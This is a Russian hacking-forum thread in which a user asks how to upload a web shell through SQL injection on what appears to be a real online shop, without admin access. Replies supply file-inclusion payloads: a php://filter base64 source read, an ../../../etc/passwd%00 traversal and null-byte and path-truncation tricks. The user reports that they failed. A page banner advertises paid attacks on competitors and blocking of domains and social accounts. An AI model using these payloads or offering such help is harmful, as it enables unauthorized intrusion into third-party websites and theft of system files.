шелл через sql — ANTICHAT Forum

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
шелл через sql

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

02.01.2016, 23:38

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?

03.01.2016, 02:42

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от .Light.

↑
Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?

если у пользователя есть доступ к file_priv. это все описано в статьях

04.01.2016, 17:38

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

Что можно сделать с этим?

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in /home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in /home/piercing/data/www//shop/includes/application_top.php on line 291

04.01.2016, 19:53

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

Цитата:

Сообщение от BigBear

↑
Обыкновенная AFR же. С суффиксом, разве что, может быть помучаешься, если MQ on.
%00
././[4096]././

Можно по подробнее?

04.01.2016, 21:02

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

у вас инклуд или что? покажите полностью запрос и ответ

04.01.2016, 22:25

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

http://www./shop/info.php?id=1'

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291

04.01.2016, 23:00

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от .Light.

↑
http://www./shop/info.php?id=1
'
Warning
: require(includes/languages/.php): failed to open stream: No such file or directory in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
Fatal error
: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in
/home/piercing/data/www//shop/includes/application_top.php
on line
291

попробуй так

http://www./shop/info.php?id=php://filter/convert.base64-encode/resource=../index

или так

http://www./shop/info.php?id=../../../etc/passwd%00

05.01.2016, 11:11

.Light.

Участник форума

Регистрация: 12.07.2010

Сообщений: 190

Провел на форуме:
65956

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
попробуй так
http://www./shop/info.php?id=php://filter/convert.base64-encode/resource=
../index
или так
http://www./shop/info.php?id=../../../etc/passwd
%00

Тоже самое(

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291